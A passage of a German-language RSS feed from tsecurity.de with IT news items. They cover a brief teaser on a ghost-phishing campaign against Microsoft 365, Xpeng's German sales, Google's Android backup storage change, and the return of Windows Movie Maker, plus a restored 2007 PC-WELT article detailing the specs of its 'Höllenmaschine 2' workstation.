<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ghost-phishing-microsoft-365-browser-dom.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ghost-phishing-microsoft-365-browser-dom.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ghost-phishing-microsoft-365-browser-dom-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ghost-phishing-microsoft-365-browser-dom-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ghost-phishing-microsoft-365-browser-dom-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ghost-phishing-microsoft-365-browser-dom-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ghost-phishing-microsoft-365-browser-dom-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Eine neue Ghost-Phishing-Welle verschleiert bösartige Inhalte so lange, bis die Seite im Browser entschlüsselt und im DOM sichtbar wird. Das macht klassische URL-Checks und Netzwerkregeln in der Praxis blind, obwohl der erste HTTP-Response für Prüfmechanismen „harmlos“ wirkt. In einer aktuellen Kampagne nutzt EvilTokens zudem Microsoft Device Code Phishing, um Opfer in […]</p>
<div><a href="https://www.it-boltwise.de/ghost-phishing-warum-verschluesselte-webseiten-url-checks-umgehen-und-microsoft-365-gefaehrden.html">... den vollständigen Artikel <strong>»Ghost Phishing: Warum verschlüsselte Webseiten URL-Checks umgehen und Microsoft 365 gefährden«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/ghost-phishing-warum-verschluesselte-webseiten-url-checks-umgehen-und-microsoft-365-gefaehrden.html">Ghost Phishing: Warum verschlüsselte Webseiten URL-Checks umgehen und Microsoft 365 gefährden</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Xpeng wirbt mit „Wachstumskurs in Deutschland“]]></title>
<description><![CDATA[Xpeng konnte sich im ersten Halbjahr um 215 Prozent in Deutschland steigern, was zwar auf den ersten Blick sehr beachtlich klingt, aber mit 3.357 Neuzulassungen ist die Marke aus China …]]></description>
<link>https://tsecurity.de/de/3654855/it-nachrichten/xpeng-wirbt-mit-wachstumskurs-in-deutschland/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654855/it-nachrichten/xpeng-wirbt-mit-wachstumskurs-in-deutschland/</guid>
<pubDate>Wed, 08 Jul 2026 18:19:27 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1600" height="1100" src="https://i0.wp.com/www.mobiflip.de/wp-content/uploads/2026/05/xpeng-g6-seite.jpg?fit=1600%2C1100&amp;ssl=1" class="attachment-full size-full wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://i0.wp.com/www.mobiflip.de/wp-content/uploads/2026/05/xpeng-g6-seite.jpg?w=1600&amp;ssl=1 1600w, https://i0.wp.com/www.mobiflip.de/wp-content/uploads/2026/05/xpeng-g6-seite.jpg?resize=690%2C474&amp;ssl=1 690w" sizes="(max-width: 1600px) 100vw, 1600px">
Xpeng konnte sich im ersten Halbjahr um 215 Prozent in Deutschland steigern, was zwar auf den ersten Blick sehr beachtlich klingt, aber mit 3.357 Neuzulassungen ist die Marke aus China …]]></content:encoded>
</item>
<item>
<title><![CDATA[Google erlaubt Android-Nutzern ab sofort kein Gratis-Backup mehr]]></title>
<description><![CDATA[Google wird nun alle Daten von Android-Sicherungskopien auf den Speicherplatz im Google-Konto des Nutzers anrechnen, wie die Seite Engadget berichtet. Bislang wirkten sich lediglich Inhalte in Google Fotos sowie Bilder und Videos in MMS-Sicherungskopien auf das Speicherkontingent aus.



Für neue...]]></description>
<link>https://tsecurity.de/de/3654465/it-nachrichten/google-erlaubt-android-nutzern-ab-sofort-kein-gratis-backup-mehr/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654465/it-nachrichten/google-erlaubt-android-nutzern-ab-sofort-kein-gratis-backup-mehr/</guid>
<pubDate>Wed, 08 Jul 2026 15:31:53 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Google wird nun alle Daten von Android-Sicherungskopien auf den Speicherplatz im Google-Konto des Nutzers anrechnen, wie die Seite <a href="https://www.engadget.com/2209189/google-will-now-count-all-android-backup-data-toward-your-storage-cap/">Engadget</a> berichtet. Bislang wirkten sich lediglich Inhalte in Google Fotos sowie Bilder und Videos in MMS-Sicherungskopien auf das Speicherkontingent aus.</p>



<p>Für neue Android-Nutzer tritt die Änderung ab heute, 7. Juli 2026, in Kraft. Für bestehende Nutzer wird sie in den kommenden Monaten schrittweise eingeführt.</p>



<p>Laut Google werden die Auswirkungen dieser Änderung voraussichtlich begrenzt sein. Android-Sicherungskopien werden im Durchschnitt etwa 40 Megabyte zusätzlichen Speicherplatz beanspruchen. Gleichzeitig werden weitere Einstellungen eingeführt, die den Nutzern mehr Kontrolle darüber geben, was gesichert wird.</p>



<p>Zuvor wurde etwa bekannt, <a href="https://www.pcwelt.de/article/3181692/alle-android-nutzer-bekommen-nun-diese-wichtige-backupfunktion.html" target="_blank" rel="noreferrer noopener">dass Android-Nutzer eine wichtige neue Backup-Funktion erhalten</a>, mit der sie selbst entscheiden können, welche App-Daten gesichert werden sollen und welche nicht. Demnächst möchte Google noch einführen, dass Nutzer ihre Geräteeinstellungen, den Anrufverlauf sowie SMS- und MMS-Nachrichten aus dem Sicherungsvorgang ausschließen können.</p>



<p>Es ist erwähnenswert, dass Google im Mai gleichzeitig den kostenlosen Speicherplatz für neue Konten <a href="https://www.pcwelt.de/article/3140205/googles-gratis-onlinespeicher-schrumpft-falls-sie-google-nicht-ihre-telefonnummer-verraten-test.html" target="_blank" rel="noreferrer noopener">von 15 Gigabyte auf 5 Gigabyte reduziert hat.</a> Es sei denn, der Nutzer verknüpft eine Telefonnummer mit dem Konto.</p>



<p>Je nachdem, wie viele Daten Sie bereits in der Google Cloud gesichert haben, könnte es also eng werden, selbst wenn die Sicherung nur wenige MB groß ist. Oder Sie merken von der Änderung nicht wirklich viel, da Sie ohnehin auf andere Backup-Methoden setzen.</p>



<p>Ein Upgrade auf 100 GB in <a href="https://one.google.com/about/plans?hl=de&amp;g1_landing_page=60" target="_blank" rel="noreferrer noopener">Google One</a> kostet 1,99 Euro monatlich, 2,99 Euro für 200 GB oder 9,99 Euro monatlich für 2 TB Speicherplatz. Mit enthalten ist auch der Zugriff auf “neue und leistungsstarke Funktionen” in Google Gemini.</p>



<p><a href="https://www.pcwelt.de/article/3006100/die-besten-online-backup-dienste-im-vergleich-2.html" target="_blank" rel="noreferrer noopener">Die besten Online-Backup-Dienste im Vergleich: Nie mehr Daten verlieren</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT-Sicherheit braucht weniger Angst - Deutscher Presseindex]]></title>
<description><![CDATA[Cybersecurity ist längst kein reines IT-Thema mehr – sie ist ein permanenter Wettkampf. Auf der einen Seite stehen Angreifer, die mit immer neuen ...]]></description>
<link>https://tsecurity.de/de/3654031/it-security-nachrichten/it-sicherheit-braucht-weniger-angst-deutscher-presseindex/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654031/it-security-nachrichten/it-sicherheit-braucht-weniger-angst-deutscher-presseindex/</guid>
<pubDate>Wed, 08 Jul 2026 12:54:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Cybersecurity ist längst kein reines <b>IT</b>-Thema mehr – sie ist ein permanenter Wettkampf. Auf der einen Seite stehen Angreifer, die mit immer neuen ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Sie können den klassischen Windows Movie Maker jetzt wieder herunterladen: So geht’s]]></title>
<description><![CDATA[Im Januar 2017 beschloss Microsoft, das klassische Videobearbeitungsprogramm Windows Movie Maker einzustellen, sehr zur Enttäuschung der Nutzer. Sie konnten damit Videos schneiden und bearbeiten, Effekte einfügen und das finale Ergebnis in verschiedene Dateiformate umwandeln.



Nun wurde jedoch ...]]></description>
<link>https://tsecurity.de/de/3653866/it-nachrichten/sie-koennen-den-klassischen-windows-movie-maker-jetzt-wieder-herunterladen-so-gehts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653866/it-nachrichten/sie-koennen-den-klassischen-windows-movie-maker-jetzt-wieder-herunterladen-so-gehts/</guid>
<pubDate>Wed, 08 Jul 2026 11:47:41 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Im Januar 2017 beschloss Microsoft, das klassische Videobearbeitungsprogramm Windows Movie Maker einzustellen, sehr zur Enttäuschung der Nutzer. Sie konnten damit Videos schneiden und bearbeiten, Effekte einfügen und das finale Ergebnis in verschiedene Dateiformate umwandeln.</p>



<p>Nun wurde jedoch <a href="https://archive.org/details/windows-movie-maker-6.0-setup" data-type="link" data-id="https://archive.org/details/windows-movie-maker-6.0-setup">die Version 6.0 von Windows Movie Maker im Internet Archive zur Verfügung gestellt</a>, sodass das Programm im Jahr 2026 wieder heruntergeladen werden kann. Über die Downloadseite kommen Sie direkt an die Originalversion des Programms und können es auf Ihrem PC installieren. Die Dateigröße beträgt 8,8 MB, und Sie müssen sich nicht anmelden.</p>



<p>Laut <a href="https://www.windowslatest.com/2026/07/07/i-installed-windows-movie-maker-in-2026-and-it-uses-97-less-ram-than-clipchamp/" data-type="link" data-id="https://www.windowslatest.com/2026/07/07/i-installed-windows-movie-maker-in-2026-and-it-uses-97-less-ram-than-clipchamp/">Windows Latest</a> benötigt Windows Movie Maker 97 Prozent weniger Arbeitsspeicher als sein Nachfolger Clipchamp. Es kann sich also durchaus lohnen, zu testen, ob das Programm noch Ihren Anforderungen entspricht. In unserem Artikel <a href="https://www.pcwelt.de/article/1111069/videoschnitt-movie-maker-videos-schneiden-schritt-fuer-schritt.html" target="_blank" rel="noreferrer noopener">Windows Movie Maker Download &amp; Anleitung: Gratis-Tool für Video-Schnitt</a> finden Sie Anregungen für die ersten Schritte.</p>



<p>Windows Movie Maker 6.0 läuft auch auf neueren Systemen wie Windows 10 und 11, allerdings wurde es eben seit fast zehn Jahren nicht mehr aktualisiert. Sie tun also gut daran, die Speicherfunktion so oft wie möglich zu nutzen, um auf der sicheren Seite zu sein.</p>



<p><a href="https://www.pcwelt.de/article/2980649/kostenlose-online-videobearbeitung-beste-dienste.html" target="_blank" rel="noreferrer noopener">Videos gratis im Browser schneiden: Die besten Online-Tools ohne Installation</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Vor 19 Jahren: PC-WELT verlost die Höllenmaschine 2 für 20.000 Euro]]></title>
<description><![CDATA[Hinweis: Dieser Artikel erschien im März 2007 auf pcwelt.de. Anlässlich unseres 20‑jährigen Jubiläums haben wir mittels der Wayback Machine des Internet Archive das zeitgeschichtliche Dokument restauriert. Wir haben alle Hyperlinks im Text belassen – sofern sie noch auf historische Inhalte führen...]]></description>
<link>https://tsecurity.de/de/3653681/it-nachrichten/vor-19-jahren-pc-welt-verlost-die-hoellenmaschine-2-fuer-20000-euro/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653681/it-nachrichten/vor-19-jahren-pc-welt-verlost-die-hoellenmaschine-2-fuer-20000-euro/</guid>
<pubDate>Wed, 08 Jul 2026 10:33:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Hinweis: Dieser Artikel erschien im März 2007 auf pcwelt.de. Anlässlich unseres 20‑jährigen Jubiläums haben wir mittels der <a href="https://web.archive.org/" target="_blank" rel="noreferrer noopener">Wayback Machine des Internet Archive</a> das zeitgeschichtliche Dokument restauriert. Wir haben alle Hyperlinks im Text belassen – sofern sie noch auf historische Inhalte führen.</p>



<p>Hier geht es direkt zum <a href="https://www.pcwelt.de/hmx" target="_blank" rel="noreferrer noopener">Gewinnspiel der aktuellen Höllenmaschine HMX 6 im Gesamtwert von 40.000 Euro</a>. Bestens informiert bleiben Sie mit unserem <a href="https://www.pcwelt.de/newsletter-anmeldung" target="_blank" rel="noreferrer noopener">HMX-6-Newsletter</a> – aber vergessen Sie nicht, die Anmeldung via E-Mail zu bestätigen. Und nun viel Spaß mit der zweiten Höllenmaschine:</p>



<p>Wir lassen die Katze aus dem Sack: Unser Traumrechner ist vollgestopft mit allem, was aktuell, gut und teuer ist. Jetzt geht’s los: Activate!</p>



<p>Alles neu, alles besser: Die Höllenmaschine 2 der PC-WELT geht weit über das hinaus, was das <a href="https://www.pcwelt.de/article/3139027/vor-20-jahren-die-erste-hoellenmaschine-der-pc-welt-2006.html" target="_blank" rel="noreferrer noopener">Vorgänger-Modell</a> bot: Zu den Highlights gehören die zwei Direct-X-10-Grafikkarten, die beiden Quad-Core-Prozessoren, der Blue-Ray-Brenner und die rasanten SAS-Festplatten.</p>



<p>Auch mit einem Standardgehäuse geben wir uns nicht mehr zufrieden: Diesmal musste es ein Maßanzug sein, den wir beim Fachmann bestellten. Der war alles andere als günstig – allein die Materialkosten summieren sich auf knapp 3600 Euro. </p>



<p>Wir werden Sie umfassend über die Höllenmaschine 2 informieren. Dazu haben wir die Übersichtsseite www.pcwelt.de/hoelle eingerichtet. Dort finden Sie tagesaktuell Tests, Hintergrundberichte, Video-Clips und Downloads rund um den 20.000-Euro-Superrechner – etwa unsere Titelmelodie “Activate” als <a href="https://web.archive.org/web/20070315054309/http:/www.pcwelt.de/downloads/entertainment_spiele/unterhaltung/73303/index.html">MP3-Download</a>. Doch jetzt geht’s endlich los: Wir stellen Ihnen den Rechnertraum in allen Details vor.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<h2 class="wp-block-heading toc">Prozessor: Dual-Quad-Core</h2>



<p>Zwei Workstation-Prozessoren des Typs <a href="https://web.archive.org/web/20070315054035/ftp:/download.intel.com/products/processor/xeon/dc53kprodbrief.pdf">Intel Xeon DP 5355</a> zum Stückpreis von 1200 Euro gehen auch bei rechenintensiven Profi-Programmen nicht in die Knie. Die Vier-Kern-CPUs arbeiten mit einem Prozessortakt von 2,67 GHz und greifen auf jeweils 8 MB L2-Cache zurück. Der Systemtakt des Intel Xeon 5355 beträgt 333 (effektiv 1333) MHz. Damit erreicht die Datenkapazität, die jeder der beiden Prozessoren pro Sekunde mit dem System austauschen kann, bis zu 10,5 GB. Der Xeon DP 5355 unterstützt <a href="https://web.archive.org/web/20070315054035/http:/www.tecchannel.de/server/hardware/402269/">FB-DIMM-Speicher</a> der DDR2-Spezifikationen PC533 und PC667.</p>



<p>Das Prozessor-Duo basiert auf Intels rechenstarker <a href="https://web.archive.org/web/20070315054035/http:/www.tecchannel.de/technologie/prozessoren/441760/">Core-Architektur</a>, die sich dank 65-Nanometer-Fertigung und ausgeklügelter Stromspartechniken durch einen genügsamen Energieverbrauch auszeichnet: Unter anderem kann der Vierkern-Prozessor inaktive Teile in jedem Rechenkern abschalten (Intelligent Power Capability), jeden Kern unabhängig voneinander in den stromsparenden Bereitschaftszustand versetzen (Enhanced Halt State) und jedem Rechenkern die Taktfrequenz und Kernspannung zuweisen, die für die aktuell benötigte Rechenleistung notwendig ist (Enhanced Intel Speedstep). Dank dieser Stromspartricks liegt die Thermal Design Power (TDP) des Quad-Cores bei lediglich 120 Watt – sensationell niedrig im Vergleich zu einer Einkern-CPU wie beispielsweise dem Pentium 4 670 (<a href="https://web.archive.org/web/20070315054035/http:/www.pcwelt.de/tests/hardware-tests/prozessoren/114491/">Test</a>), der mit 115 Watt fast genauso viel Energie verbrät.</p>



<p>Mehr Möglichkeiten: Der Xeon DP 5355 unterstützt die Virtualisierungs-Technik <a href="https://web.archive.org/web/20070315054035/http:/www.intel.com/technology/virtualization/index.htm">Vanderpool</a> sowie 32- und 64-Bit-Betriebssysteme – interessant für Nutzer, die unter anderem virtuelle Server mit unterschiedlichen Betriebssystemen einrichten möchten. Mit einem Achtkern-System lässt sich da so einiges realisieren. Welche Erfahrungen wir beim Experimentieren mit Virtualisierungs-Software wie Xen und VM-Ware gemacht haben, erfahren Sie in Kürze in einem weiteren Artikel, der die Leistungsfähigkeit der Höllenmaschine 2 beleuchtet.</p>



<p>Ein System mit so vielen Hardware-Komponenten wie unsere Höllenmaschine II verlangt nach einem besonders anschlussfreudigen Untersatz: Wir haben uns für die Tyan Tempest i5000XL (S2692) mit dem Intel-Chipsatz 5000X/6321ESB entschieden. Die Workstation-Hauptplatine besitzt zwei Prozessor-Steckplätze für Sockel-771-CPUs und hat mit ihrem CEB-Formfaktor eine Übergröße von 305 x 259 Millimetern.</p>



<p>Die Tempest i5000XL wartet mit zahlreichen Schnittstellen auf: Dazu gehören unter anderem ein 8x- und zwei 16x-PCI-Express- sowie zwei PCI-X-Steckplätze. Über interne Controller stehen ein PATA- und ein Floppy-Port sowie sechs SATA2- und acht USB-2.0-High-Speed-Schnittstellen zur Verfügung. Ebenfalls integriert: eine Gigabit-Ethernet-Buchse und der HD-Audio-Controller Realtek ALC888. Vier Speicherbänke nehmen insgesamt bis zu 16 GB fully buffered DDR2-667-SDRAM auf.</p>



<p>Volle Kontrolle: Das Phoenix-BIOS der Workstation-Hauptplatine beherrscht netzwerkgestützte Funktionen wie „Serial Console Redirect“ und „Preboot Execution Environment“ (PXE). Hinzu kommt eine frei konfigurierbare Monitoring-Funktion. Wer will, kann außerdem das <a href="https://web.archive.org/web/20070315054444/http:/de.wikipedia.org/wiki/Trusted_Platform_Module">Trusted Platform Module</a> (TPM) Infineon SLB9635TT aktivieren, das im Intel-Chipsatz integriert ist.</p>



<h2 class="wp-block-heading toc">Grafik: Dual Direct X 10</h2>



<p>Eine Direct-X-10-Grafiklösung ist Pflicht für unseren 20.000-Euro-Rechner. Wir haben uns für zwei Grafikkarten des Typs <a href="https://web.archive.org/web/20070315054738/http:/www.pny.eu/products.php?section=product&amp;categoryid=7&amp;subcategoryid=64&amp;productid=95">PNY Verto Geforce 8800 GTX</a> entschieden. Der Grafikchip Geforce 8800 GTX besteht aus 681 Millionen Transistoren.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e0b0999014"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/PNY-Verto-Geforce-8800-GTX.jpg?quality=50&amp;strip=all" alt="PNY Verto Geforce 8800 GTX" class="wp-image-3182066" width="819" height="614" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">PNY</p></div>



<p>Damit übertrifft die Komplexität von Nvidias <a href="https://web.archive.org/web/20070315054738/http:/www.pcwelt.de/tests/hardware-tests/pci-express-grafikkarten/63061/">Geforce-8-Generation</a> alle GPUs (Graphic Processing Unit), die bisher auf den Markt gekommen sind. Zum Vergleich: AMDs Spitzenmodell Radeon X1950 XTX stehen mit 384 Millionen nur rund die Hälfte an Transistoren zur Verfügung. Und der hauseigene Vorgänger Geforce 7900 GTX kommt lediglich auf 278 Millionen Schaltkreise.</p>



<p>Die unglaubliche Komplexität liegt in der Architektur begründet, die Nvidia komplett neu entwickelt hat. Beim Geforce 8 handelt es sich um Nvidias ersten Grafikchip mit der sogenannten „Unified Shader Architecture“. Es gibt also keine spezialisierten Pixel- und Vertex-Shader mehr, sondern universell einsetzbare Shader, die dynamisch die Rechenarbeit übernehmen. Insgesamt werkeln im Geforce 8800 GTX satte 128 dieser Rechenwerke, die Nvidia Streaming-Prozessoren (SP) getauft hat. Die SPs fungieren nicht nur als Pixel- oder Vertex-Shader, sondern können auch die Geometrie- und Physik-Berechnung übernehmen.</p>



<p>Der eigentliche Takt des Grafikchips beträgt beim Geforce 8800 GTX nur 575 MHz. Die Taktfrequenz der Streaming-Prozessoren des Nvidia-Flaggschiffs liegt hingegen bei außerordentlichen 1350 MHz. Sogenannte Threading-Einheiten teilen die anfallenden Rechenaufgaben dynamisch in kleine Stücke auf und schicken sie an die Streaming-Prozessoren. Nvidia nennt diese Technik „Gigathread Technology“.</p>



<p>Jede PNY-Grafikkarte (<a href="https://web.archive.org/web/20070315054738/http:/www.pcwelt.de/tests/hardware-tests/pci-express-grafikkarten/63070/">PC-WELT-Test</a>) greift auf 768 MB GDDR3-SDRAM (effektiver Takt: 1800 MHz) zu, das an einen 384 Bit breiten Speicherbus angebunden ist. Damit erhöht sich die theoretisch maximale Speicherbandbreite auf heftige 86,4 GB/s. Hoch aufgelöste Filme auf Blu-Ray- und HD-DVD-Medien kann die Karte dank integriertem HDCP-Chip ebenfalls ausgeben.</p>



<p>Wermutstropfen: Derzeit lässt sich unter Windows Vista und XP nur eine Karte ansprechen, da Nvidia die SLI-Funktion für den 5000X-Chipsatz von Intel nicht freigeschaltet hat. Nvidias Treiber-Entwicklerteam kümmert sich erst einmal um die hauseigenen Hauptplatinen-Chipsätze und programmiert fieberhaft an einem SLI-fähigen Direct-X-10-Treiber für Windows Vista. Da Nvidia und Intel aber seit der <a href="https://web.archive.org/web/20070315054738/http:/www.pcwelt.de/news/business/52087/index.html">ATI-Übernahme von AMD</a> enger zusammenarbeiten, sind wir zuversichtlich, dass Nvidia – sobald die Hausaufgaben erledigt sind – auch eine SLI-Lösung für Intel-Chipsätze anbietet. Und wenn’s bei Nvidia etwas länger dauern sollte – freigeschaltete SLI-Treiber für die Geforce-7-Baureihe waren ja auch recht flott auf den einschlägigen Websites erhältlich …</p>



<h2 class="wp-block-heading toc">Ausstattung der Höllenmaschine 2 im Überblick</h2>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td><strong>Komponente</strong></td><td><strong>Modell</strong></td><td><strong>Preis</strong> <strong>(Euro)</strong> am 3.3.2007</td></tr><tr><td>Hauptplatine</td><td>Tyan Tempest i5000XL (S2692)</td><td>400</td></tr><tr><td>Prozessor</td><td>2 x Intel Xeon 5355 Quad-Core</td><td>2400</td></tr><tr><td>Speicher</td><td>4 x 1 GB Corsair registered PC667 FB-DIMM</td><td>850</td></tr><tr><td>Grafik</td><td>2 x PNY Verto Geforce 8800 GTX mit je 768 MB GDDR3-Speicher</td><td>1100</td></tr><tr><td>Raid-Controller</td><td>Adaptec 4800SAS/128, PCI-X</td><td>850</td></tr><tr><td>Festplatten</td><td>4 x 147 GB Seagate Cheetah 15K.4 ST3146854SS, SAS, Raid 10</td><td>2600</td></tr><tr><td></td><td>4 x 750 GB Seagate Barracuda ST3750640AS, SATA II, Raid 10</td><td>1400</td></tr><tr><td></td><td>Seagate Pushbutton External Hard Drive 750 GB, Firewire/USB 2.0</td><td>400</td></tr><tr><td>Brenner</td><td>Blu-ray-Laufwerk Philips SPD7000BD, SATA</td><td>850</td></tr><tr><td></td><td>DVD-Laufwerk Samsung SH-S182A, PATA</td><td>50</td></tr><tr><td>Gehäuse</td><td>PC-WELT Höllenmaschine 2 von Heiko Polaczek (nur Materialwert)</td><td>3600</td></tr><tr><td>Wasserkühlung</td><td>Innovatek Triple Radiator, Tank-O-Matik, Eheim-Pumpe HPPS Plus, Flowmeter Pro 3.6 sowie CPU-, Grafikchip- und Festplattenkühler</td><td>1950</td></tr><tr><td>Netzteil</td><td>Enermax Galaxy EGA1000EWL, 1000 Watt</td><td>350</td></tr><tr><td>Soundkarte</td><td>Creative X-Fi Fatal1ty Edition</td><td>200</td></tr><tr><td>Boxensystem</td><td>Creative Gigaworks Progamer G550W</td><td>450</td></tr><tr><td>Bildschirme</td><td>BenQ FP241W 24-Zoll-TFT</td><td>1100</td></tr><tr><td></td><td>integrierter 8-Zoll-LCD-Touchscreen VE-XVT-8</td><td>250</td></tr><tr><td>Betriebssysteme</td><td>Microsoft Windows Vista Ultimate</td><td>550</td></tr><tr><td></td><td>Open Suse Linux 10.2</td><td>50</td></tr><tr><td>Eingabegeräte</td><td>Logitech di Novo Edge Tastatur &amp; MX Revolution Maus</td><td>300</td></tr></tbody></table></figure>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e0b0999dca"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/HM2-Titel.jpg?quality=50&amp;strip=all&amp;w=1200" alt="PC-WELT Höllenmaschine 2 aus dem Jahre 2007" class="wp-image-3162271" width="1200" height="553" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Die Höllenmaschine 2 aus dem Jahr 2007</figcaption></figure><p class="imageCredit">PC-WELT</p></div>



<h2 class="wp-block-heading toc">RAM und HDDs: FB-DIMM und Quad-SAS</h2>



<p>Wir bestücken alle vier Speicherbänke der Workstation-Hauptplatine mit Fully Buffered DDR2-667-SDRAM – und zwar mit den 1-GB-Modulen <a href="https://web.archive.org/web/20070315055004/http:/www.corsair.com/corsair/products/specs/CM73DD1024R.pdf">Corsair CM73DD1024R-667</a>. Fully-Buffered-Speicher nutzt zusätzliche Datenleitungen für die Datenintegritätsprüfung. Für eine schnellere Datenverarbeitung laufen die vier Speichermodule paarweise im Zwei-Kanal-Modus.</p>



<p>Das schwächste Glied in aktuellen PCs ist meist die Festplatte. Nicht so bei der Höllenmaschine 2: Sie vertraut auf superschnelle Server-Laufwerke, die die Punkt-zu-Punkt-Verbindung Serial Attached SCSI (SAS) nutzen. SAS ist der Nachfolger der parallelen SCSI-Schnittstelle und bietet eine theoretische Datentransferrate von bis zu 300 MB/s, die sich im Gegensatz zu SATA II in der Praxis mit Raid-Konfigurationen auch tatsächlich annähernd erreichen lässt.</p>



<p>Für die Höllenmaschine fiel unsere Wahl auf das Modell <a href="https://web.archive.org/web/20070315054634/http:/www.seagate.com/docs/pdf/datasheet/disc/ds_cheetah15k.4.pdf">Seagate Cheetah 15K.4 ST3146854SS</a> mit 147 GB formatierter Kapazität. Preis pro Stück: knapp 650 Euro. Das 3,5-Zoll-Laufwerk rotiert mit 15 000 Umdrehungen pro Minute, der Datenpuffer beträgt 8 MB. Die durchschnittliche Zugriffszeit der Cheetah 15K.4 liegt laut Hersteller bei 2 Millisekunden. Damit wäre das Seagate-Laufwerk mehr als doppelt so fix wie die bisher schnellste von uns getestete SATA-Festplatte.</p>



<p>Die Seagate Cheetah 15K.4 ST3146854SS besitzt vier Datenscheiben mit jeweils zwei Schreib-Lese-Köpfen. Die <a href="https://web.archive.org/web/20070315054634/http:/www.pcwelt.de/know-how/tipps_tricks/hardware/festplatten/66306/index.html">Zuverlässigkeit</a> respektive MTBF (Mean Time Between Failures) der SAS-Laufwerke gibt Seagate mit 1,4 Millionen Betriebsstunden an. Die Annualized Failure Rate (AFR), also die Wahrscheinlichkeit, dass ein Laufwerk innerhalb eines Jahres ausfällt, liegt laut Hersteller bei 0,62 Prozent.</p>



